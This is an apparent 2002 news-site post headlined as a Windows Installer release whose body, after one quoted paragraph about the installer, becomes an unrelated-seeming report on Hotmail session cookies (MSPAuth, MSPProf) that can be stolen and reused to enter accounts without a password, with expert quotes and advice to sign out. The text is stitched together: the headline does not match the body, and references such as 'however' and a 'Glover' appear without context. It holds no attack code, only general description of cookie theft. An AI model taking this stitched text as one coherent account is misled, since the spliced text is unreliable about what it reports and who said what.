New Microsoft Windows Installer v2.0.2600.2
Posted by Daniel Fleshbourne on 27 April 2002 - 05:57 · 10 comments & 232 views
About the Author
Full name: Daniel Fleshbourne
Forum name: Daniel
Contact: via forum PM
Submissions: Normal · Headline
Full name: Daniel Fleshbourne
Forum name: Daniel
Contact: via forum PM
Submissions: Normal · Headline
Slashdot It!
Submit to reddit
Submit to blinklist
Bookmark on del.icio.us
Add to furl
Share on Facebook
Add to Windows Live
Add to Google
"Windows Installer enables software users to efficiently install and configure products and applications. The installer can also provide software products with new capabilities to advertise features without installing them, to install products on demand, and to add user customizations. The Windows Installer supports advertisement of applications and features according to the operating system".
Security experts, however, said today that the Hotmail vulnerability exposes the risks of relying on browser cookies as the digital keys to Internet sites.
Cookies, the small data files placed on an Internet user's computer when visiting websites, are primarily used to identify visitors for the purpose of customizing content such as advertising. But many sites, including Hotmail, also rely on cookies for more serious authentication purposes.
For such sites, the cookie is akin to an ATM banking card that doesn't also require the holder to provide a password. Lose the "card" and you may give up your security.
"Cookies were never designed to be an authentication mechanism. But anyone trying to deploy a Web application today doesn't really have much choice," said Marc Slemko, a Seattle-based security expert who has previously discovered cookie-related security problems at Microsoft's Passport service.
Without physical access to a PC, how big a hurdle is stealing Hotmail cookies? "Trivial," said Slemko, who pointed out years ago how cross-site scripting flaws can be exploited to perform attacks such as pilfering cookies.
What's more, security bugs in Internet Explorer make robbing a remote user of his Hotmail cookies a snap, according to Thor Larholm, a Danish programmer and security specialist who has compiled a list of IE browser flaws, many of which allow cookie-snatching exploits.
"I would say that a malicious programmer's day-to-day chances at successfully stealing the target's cookies lie between very easy and easy," said Larholm, noting that browser cookies are stored unencrypted and in a fixed location.
According to Slemko, most sites that rely on cookies to authenticate users -- including online banks, brokerages, and e-commerce sites -- typically design the tokens to expire after users have been logged in and inactive for a few minutes.
But in an apparent effort to boost convenience for its users, Hotmail allows users to make their authentication cookies practically permanent.
At the Web-mail service, a half dozen cookies are written to the hard disk when the user clicks the "keep me signed in" option while logging in to the service. The option is designed to relieve Hotmail users of being nagged for a password each time they check their mail throughout the day.
Two of the cookies, set by MSN.com and named "MSPAuth" and "MSPProf," are the digital keys that allow an attacker to access the interior pages of a Hotmail account without being prompted to sign in, and to read and send messages from the account and change the account holder's preferences.
In tests by Wired News, the Hotmail cookies appeared to stay on the PC unless the user clicked the "Sign Out .NET" button or re-booted the computer. Merely closing the browser did not delete them.
According to Slemko, the Hotmail cookie problem could stem from a bug in an optional feature offered by the service. Hotmail enables users to configure a "session expiration" option that promises to "automatically end" the user's session after a specified time interval.
But even with the expiration option enabled at its most secure setting, testing by Wired News showed that a cookie could be exported to another computer and still used to authenticate a password-less Hotmail login 24 hours later.
Aside from correcting the session expiration bug, Slemko said there's little Microsoft can do to guard Hotmail users against cookie attacks.
"They are balancing convenience and security. If they added, for example, another layer of checks with the central Passport servers, the whole system would become even slower and more unreliable," Slemko said.
Since Hotmail is designed to allow users to access their accounts from any computer anywhere, the service's authentication cookies do not appear to constrain access based on a user's Internet Protocol address, according to Glover.
A Hotmail user's best defense against cookie robbers, Glover said, is to shun the "keep me signed in" option, and to follow Microsoft's advice and click the service's sign-out icon when finished with a Hotmail session. But Glover said such tactics will require a change of habits for Hotmail users.
"I hypothesize that the majority of them sign on first thing in the morning and stay logged in to their Hotmail accounts all day. I don't think they realize this is setting them up to have their identities stolen," he said.